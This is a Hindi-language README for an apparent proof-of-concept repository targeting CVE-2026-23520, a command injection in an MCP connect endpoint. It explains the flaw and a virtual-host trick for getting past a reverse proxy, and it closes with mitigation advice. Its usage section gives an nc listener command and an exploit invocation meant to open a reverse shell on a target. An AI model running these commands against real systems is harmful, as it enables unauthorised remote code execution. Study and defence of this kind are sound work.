
🎓 CVE-2026-23520 के लिए शैक्षिक PoC। भेद्यता विश्लेषण और नियंत्रित शमन प्रयोगशाला। 🧪
अस्वीकरण: यह रिपॉजिटरी और इसमें शामिल स्क्रिप्ट्स केवल शैक्षिक और अकादमिक उद्देश्यों के लिए हैं।
यहां प्रदान की गई जानकारी का उद्देश्य सुरक्षा शोधकर्ताओं, सिस्टम प्रशासकों और छात्रों को नियंत्रित प्रयोगशाला वातावरण (जैसे Capture The Flag प्लेटफॉर्म) में कमांड इंजेक्शन कमजोरियों और वर्चुअल होस्ट रूटिंग की कार्यप्रणाली को समझने में मदद करना है।
इस उपकरण का उपयोग कभी भी मालिक की स्पष्ट, लिखित अनुमति के बिना किसी भी सिस्टम, नेटवर्क या बुनियादी ढांचे के खिलाफ न करें। लेखक इस सॉफ्टवेयर के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेते हैं।
यह रिपॉजिटरी कुछ एप्लिकेशन स्टैक (जैसे Arcane v1.13.0) में Model Context Protocol (MCP) कार्यान्वयन के संदर्भ में CVE-2026-23520 का शोषण करने के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) प्रदान करती है।
यह कमजोरी एक क्लासिक कमांड इंजेक्शन दोष है। API एंडपॉइंट (/api/mcp/connect) एक नया सर्वर कनेक्शन कॉन्फ़िगर करने के लिए JSON पेलोड स्वीकार करता है। पेलोड में serverConfig ऑब्जेक्ट शामिल है जिसमें command और args फ़ील्ड होते हैं।
चूंकि एप्लिकेशन होस्ट ऑपरेटिंग सिस्टम पर निष्पादित करने से पहले इन फ़ील्ड्स को ठीक से स्वच्छ नहीं करता, एक हमलावर वैध सेवा पथ के बजाय दुर्भावनापूर्ण bash कमांड (जैसे रिवर्स शेल) प्रदान कर सकता है।
कई वास्तविक दुनिया या CTF तैनातियों में, मुख्य IP पते पर केवल एक्सप्लॉइट भेजने से 404 Not Found त्रुटि उत्पन्न होगी। ऐसा इसलिए होता है क्योंकि कमजोर घटक (जैसे MCPJam Inspector) एक रिवर्स प्रॉक्सी (जैसे Nginx) के पीछे होस्ट किया गया है जो Host हेडर के आधार पर ट्रैफ़िक को रूट करता है।
यह PoC उपयोगकर्ता को प्रॉक्सी रूटिंग नियमों को बायपास करने और कमजोर एप्लिकेशन पर सीधे हमला करने के लिए वर्चुअल होस्ट (vhost) निर्दिष्ट करने की स्पष्ट अनुमति देकर मानक एक्सप्लॉइट से अलग है।
इस स्क्रिप्ट के लिए Python 3 और requests लाइब्रेरी की आवश्यकता है।
pip install requests
python3 exploit_vhost.py <target_ip> <target_port> <virtual_host> <listener_ip> <listener_port>
nc -lvnp 4444
python3 exploit_vhost.py 10.129.x.x 443 mcp.target.local 10.10.x.x 4444
नोट: "Read timed out" त्रुटि अपेक्षित है और यह इंगित करती है कि रिवर्स शेल सफलतापूर्वक निष्पादित हो गया है और कनेक्शन को खुला रख रहा है।
प्रशासकों को यह सुनिश्चित करना चाहिए कि वे सॉफ्टवेयर का नवीनतम पैच किया गया संस्करण चला रहे हैं। यदि पैच करना तुरंत संभव नहीं है, तो /api/mcp/connect एंडपॉइंट तक पहुंच प्रतिबंधित करें और सुनिश्चित करें कि सभी serverConfig पैरामीटर्स पर सख्त इनपुट सत्यापन लागू किया गया है।